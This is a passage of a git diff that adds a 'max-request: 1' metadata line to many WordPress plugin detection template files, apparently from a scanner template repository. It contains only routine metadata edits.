diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml
index 1426ac3ef2..2a79d529cc 100644
--- a/http/technologies/wordpress/plugins/autoptimize.yaml
+++ b/http/technologies/wordpress/plugins/autoptimize.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/autoptimize/
   metadata:
+    max-request: 1
     plugin_namespace: autoptimize
     wpscan: https://wpscan.com/plugin/autoptimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml
index 78d1651ff4..556a113acc 100644
--- a/http/technologies/wordpress/plugins/backwpup.yaml
+++ b/http/technologies/wordpress/plugins/backwpup.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/backwpup/
   metadata:
+    max-request: 1
     plugin_namespace: backwpup
     wpscan: https://wpscan.com/plugin/backwpup
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml
index f7219b373d..58d9a9d738 100644
--- a/http/technologies/wordpress/plugins/better-search-replace.yaml
+++ b/http/technologies/wordpress/plugins/better-search-replace.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/better-search-replace/
   metadata:
+    max-request: 1
     plugin_namespace: better-search-replace
     wpscan: https://wpscan.com/plugin/better-search-replace
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml
index f688a68f72..6c9c485079 100644
--- a/http/technologies/wordpress/plugins/better-wp-security.yaml
+++ b/http/technologies/wordpress/plugins/better-wp-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/better-wp-security/
   metadata:
+    max-request: 1
     plugin_namespace: better-wp-security
     wpscan: https://wpscan.com/plugin/better-wp-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
index 00e95c4263..7631e87d78 100644
--- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
+++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/black-studio-tinymce-widget/
   metadata:
+    max-request: 1
     plugin_namespace: black-studio-tinymce-widget
     wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
index 212b2b13c4..c7daa26ac6 100644
--- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
+++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/breadcrumb-navxt/
   metadata:
+    max-request: 1
     plugin_namespace: breadcrumb-navxt
     wpscan: https://wpscan.com/plugin/breadcrumb-navxt
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml
index 6318392c5c..68767e4dce 100644
--- a/http/technologies/wordpress/plugins/breeze.yaml
+++ b/http/technologies/wordpress/plugins/breeze.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/breeze/
   metadata:
+    max-request: 1
     plugin_namespace: breeze
     wpscan: https://wpscan.com/plugin/breeze
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml
index e1a2a186e0..073618936d 100644
--- a/http/technologies/wordpress/plugins/broken-link-checker.yaml
+++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/broken-link-checker/
   metadata:
+    max-request: 1
     plugin_namespace: broken-link-checker
     wpscan: https://wpscan.com/plugin/broken-link-checker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
index 23614882a7..6aabc19e9f 100644
--- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml
+++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/child-theme-configurator/
   metadata:
+    max-request: 1
     plugin_namespace: child-theme-configurator
     wpscan: https://wpscan.com/plugin/child-theme-configurator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml
index 85965337cb..ac80e4f31b 100644
--- a/http/technologies/wordpress/plugins/classic-editor.yaml
+++ b/http/technologies/wordpress/plugins/classic-editor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-editor/
   metadata:
+    max-request: 1
     plugin_namespace: classic-editor
     wpscan: https://wpscan.com/plugin/classic-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml
index 33d903a1b4..15d7a24755 100644
--- a/http/technologies/wordpress/plugins/classic-widgets.yaml
+++ b/http/technologies/wordpress/plugins/classic-widgets.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-widgets/
   metadata:
+    max-request: 1
     plugin_namespace: classic-widgets
     wpscan: https://wpscan.com/plugin/classic-widgets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
index 3c6f8f287b..40ccc15b27 100644
--- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
+++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/click-to-chat-for-whatsapp/
   metadata:
+    max-request: 1
     plugin_namespace: click-to-chat-for-whatsapp
     wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml
index c3b630cde2..1fad3cee08 100644
--- a/http/technologies/wordpress/plugins/cmb2.yaml
+++ b/http/technologies/wordpress/plugins/cmb2.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cmb2/
   metadata:
+    max-request: 1
     plugin_namespace: cmb2
     wpscan: https://wpscan.com/plugin/cmb2
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml
index 5c8ce709b6..ebe4ee41a7 100644
--- a/http/technologies/wordpress/plugins/coblocks.yaml
+++ b/http/technologies/wordpress/plugins/coblocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/coblocks/
   metadata:
+    max-request: 1
     plugin_namespace: coblocks
     wpscan: https://wpscan.com/plugin/coblocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml
index aea47b9e84..5c32110e0e 100644
--- a/http/technologies/wordpress/plugins/code-snippets.yaml
+++ b/http/technologies/wordpress/plugins/code-snippets.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/code-snippets/
   metadata:
+    max-request: 1
     plugin_namespace: code-snippets
     wpscan: https://wpscan.com/plugin/code-snippets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml
index 78c584c388..09c2e2f360 100644
--- a/http/technologies/wordpress/plugins/coming-soon.yaml
+++ b/http/technologies/wordpress/plugins/coming-soon.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/coming-soon/
   metadata:
+    max-request: 1
     plugin_namespace: coming-soon
     wpscan: https://wpscan.com/plugin/coming-soon
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
index 2c80d09c27..1a2e8beb3e 100644
--- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml
+++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/complianz-gdpr/
   metadata:
+    max-request: 1
     plugin_namespace: complianz-gdpr
     wpscan: https://wpscan.com/plugin/complianz-gdpr
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
index 4b1b3a8754..706145493c 100644
--- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7-honeypot/
   metadata:
+    max-request: 1
     plugin_namespace: contact-form-7-honeypot
     wpscan: https://wpscan.com/plugin/contact-form-7-honeypot
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml
index 06ad83bdf7..cf6a6ee635 100644
--- a/http/technologies/wordpress/plugins/contact-form-7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7/
   metadata:
+    max-request: 1
     plugin_namespace: contact-form-7
     wpscan: https://wpscan.com/plugin/contact-form-7
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
index b20666268f..c039765929 100644
--- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-cfdb7/
   metadata:
+    max-request: 1
     plugin_namespace: contact-form-cfdb7
     wpscan: https://wpscan.com/plugin/contact-form-cfdb7
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml
index b2a097bfe7..a2c92dff4b 100644
--- a/http/technologies/wordpress/plugins/cookie-law-info.yaml
+++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-law-info/
   metadata:
+    max-request: 1
     plugin_namespace: cookie-law-info
     wpscan: https://wpscan.com/plugin/cookie-law-info
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml
index c71fa258af..41b5d6c854 100644
--- a/http/technologies/wordpress/plugins/cookie-notice.yaml
+++ b/http/technologies/wordpress/plugins/cookie-notice.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-notice/
   metadata:
+    max-request: 1
     plugin_namespace: cookie-notice
     wpscan: https://wpscan.com/plugin/cookie-notice
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
index 5a98e67597..cca31cc3a9 100644
--- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
+++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/creame-whatsapp-me/
   metadata:
+    max-request: 1
     plugin_namespace: creame-whatsapp-me
     wpscan: https://wpscan.com/plugin/creame-whatsapp-me
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
index 4463174203..ff9c0a49ce 100644
--- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
+++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/creative-mail-by-constant-contact/
   metadata:
+    max-request: 1
     plugin_namespace: creative-mail-by-constant-contact
     wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml
index cfac0b961b..a76d3306bb 100644
--- a/http/technologies/wordpress/plugins/custom-css-js.yaml
+++ b/http/technologies/wordpress/plugins/custom-css-js.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-css-js/
   metadata:
+    max-request: 1
     plugin_namespace: custom-css-js
     wpscan: https://wpscan.com/plugin/custom-css-js
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml
index 846761f2f7..2249681b6d 100644
--- a/http/technologies/wordpress/plugins/custom-fonts.yaml
+++ b/http/technologies/wordpress/plugins/custom-fonts.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-fonts/
   metadata:
+    max-request: 1
     plugin_namespace: custom-fonts
     wpscan: https://wpscan.com/plugin/custom-fonts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
index 0def6e61ca..b5389b27c9 100644
--- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
+++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-post-type-ui/
   metadata:
+    max-request: 1
     plugin_namespace: custom-post-type-ui
     wpscan: https://wpscan.com/plugin/custom-post-type-ui
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml
index 5c5decc127..00d183f507 100644
--- a/http/technologies/wordpress/plugins/disable-comments.yaml
+++ b/http/technologies/wordpress/plugins/disable-comments.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-comments/
   metadata:
+    max-request: 1
     plugin_namespace: disable-comments
     wpscan: https://wpscan.com/plugin/disable-comments
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
index a8229a338e..451e1daef1 100644
--- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: disable-gutenberg
     wpscan: https://wpscan.com/plugin/disable-gutenberg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml
index 6559e64dce..af30ca76b6 100644
--- a/http/technologies/wordpress/plugins/duplicate-page.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-page.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-page/
   metadata:
+    max-request: 1
     plugin_namespace: duplicate-page
     wpscan: https://wpscan.com/plugin/duplicate-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml
index a4368b8aa6..93823466d4 100644
--- a/http/technologies/wordpress/plugins/duplicate-post.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-post.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-post/
   metadata:
+    max-request: 1
     plugin_namespace: duplicate-post
     wpscan: https://wpscan.com/plugin/duplicate-post
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml
index ec119e762a..e224283ecd 100644
--- a/http/technologies/wordpress/plugins/duplicator.yaml
+++ b/http/technologies/wordpress/plugins/duplicator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicator/
   metadata:
+    max-request: 1
     plugin_namespace: duplicator
     wpscan: https://wpscan.com/plugin/duplicator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
index b7ec7576a3..9af8df08a7 100644
--- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
+++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duracelltomi-google-tag-manager/
   metadata:
+    max-request: 1
     plugin_namespace: duracelltomi-google-tag-manager
     wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml
index c42d679973..d4081474c3 100644
--- a/http/technologies/wordpress/plugins/easy-fancybox.yaml
+++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-fancybox/
   metadata:
+    max-request: 1
     plugin_namespace: easy-fancybox
     wpscan: https://wpscan.com/plugin/easy-fancybox
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
index fc44375947..bcbc0707fb 100644
--- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
+++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-table-of-contents/
   metadata:
+    max-request: 1
     plugin_namespace: easy-table-of-contents
     wpscan: https://wpscan.com/plugin/easy-table-of-contents
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
index a1616c1741..8b23832297 100644
--- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
+++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-wp-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: easy-wp-smtp
     wpscan: https://wpscan.com/plugin/easy-wp-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml
index 6cfb8bc272..f0c3e4bc63 100644
--- a/http/technologies/wordpress/plugins/elementor.yaml
+++ b/http/technologies/wordpress/plugins/elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/elementor/
   metadata:
+    max-request: 1
     plugin_namespace: elementor
     wpscan: https://wpscan.com/plugin/elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml
index 9caaa53263..eab4a0d725 100644
--- a/http/technologies/wordpress/plugins/elementskit-lite.yaml
+++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/elementskit-lite/
   metadata:
+    max-request: 1
     plugin_namespace: elementskit-lite
     wpscan: https://wpscan.com/plugin/elementskit-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml
index 5e6b557952..74c172ac94 100644
--- a/http/technologies/wordpress/plugins/enable-media-replace.yaml
+++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/enable-media-replace/
   metadata:
+    max-request: 1
     plugin_namespace: enable-media-replace
     wpscan: https://wpscan.com/plugin/enable-media-replace
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml
index c5a665e6f7..f5a63a2ed2 100644
--- a/http/technologies/wordpress/plugins/envato-elements.yaml
+++ b/http/technologies/wordpress/plugins/envato-elements.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/envato-elements/
   metadata:
+    max-request: 1
     plugin_namespace: envato-elements
     wpscan: https://wpscan.com/plugin/envato-elements
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
index a8b56b5df0..25ca7328ef 100644
--- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
+++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/essential-addons-for-elementor-lite/
   metadata:
+    max-request: 1
     plugin_namespace: essential-addons-for-elementor-lite
     wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
index 4e20e57107..cb1db5bee6 100644
--- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
+++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ewww-image-optimizer/
   metadata:
+    max-request: 1
     plugin_namespace: ewww-image-optimizer
     wpscan: https://wpscan.com/plugin/ewww-image-optimizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
index 6f6a416595..a3207ea16a 100644
--- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/facebook-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: facebook-for-woocommerce
     wpscan: https://wpscan.com/plugin/facebook-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
index 2dd0ef57b5..2a4b772078 100644
--- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml
+++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/fast-indexing-api/
   metadata:
+    max-request: 1
     plugin_namespace: fast-indexing-api
     wpscan: https://wpscan.com/plugin/fast-indexing-api
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
index 11942f4fa4..366205085d 100644
--- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
+++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/favicon-by-realfavicongenerator/
   metadata:
+    max-request: 1
     plugin_namespace: favicon-by-realfavicongenerator
     wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml
index 87c2aeb4bd..598f08ce88 100644
--- a/http/technologies/wordpress/plugins/flamingo.yaml
+++ b/http/technologies/wordpress/plugins/flamingo.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/flamingo/
   metadata:
+    max-request: 1
     plugin_namespace: flamingo
     wpscan: https://wpscan.com/plugin/flamingo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml
index 3696eefbf7..42cdfb4475 100644
--- a/http/technologies/wordpress/plugins/fluentform.yaml
+++ b/http/technologies/wordpress/plugins/fluentform.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/fluentform/
   metadata:
+    max-request: 1
     plugin_namespace: fluentform
     wpscan: https://wpscan.com/plugin/fluentform
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml
index 8bab0a9c3e..a1af263dbd 100644
--- a/http/technologies/wordpress/plugins/font-awesome.yaml
+++ b/http/technologies/wordpress/plugins/font-awesome.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/font-awesome/
   metadata:
+    max-request: 1
     plugin_namespace: font-awesome
     wpscan: https://wpscan.com/plugin/font-awesome
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
index affd270123..19265f910e 100644
--- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/force-regenerate-thumbnails/
   metadata:
+    max-request: 1
     plugin_namespace: force-regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml
index ba558305a4..6b0ed799ef 100644
--- a/http/technologies/wordpress/plugins/formidable.yaml
+++ b/http/technologies/wordpress/plugins/formidable.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/formidable/
   metadata:
+    max-request: 1
     plugin_namespace: formidable
     wpscan: https://wpscan.com/plugin/formidable
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml
index 980265f531..91c89d0ad8 100644
--- a/http/technologies/wordpress/plugins/forminator.yaml
+++ b/http/technologies/wordpress/plugins/forminator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/forminator/
   metadata:
+    max-request: 1
     plugin_namespace: forminator
     wpscan: https://wpscan.com/plugin/forminator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
index daf205789d..539d9f7cec 100644
--- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml
+++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ga-google-analytics/
   metadata:
+    max-request: 1
     plugin_namespace: ga-google-analytics
     wpscan: https://wpscan.com/plugin/ga-google-analytics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
index 22bfa3ffe2..f4123bb594 100644
--- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
+++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gdpr-cookie-compliance/
   metadata:
+    max-request: 1
     plugin_namespace: gdpr-cookie-compliance
     wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
index 7ed171d662..254f916291 100644
--- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
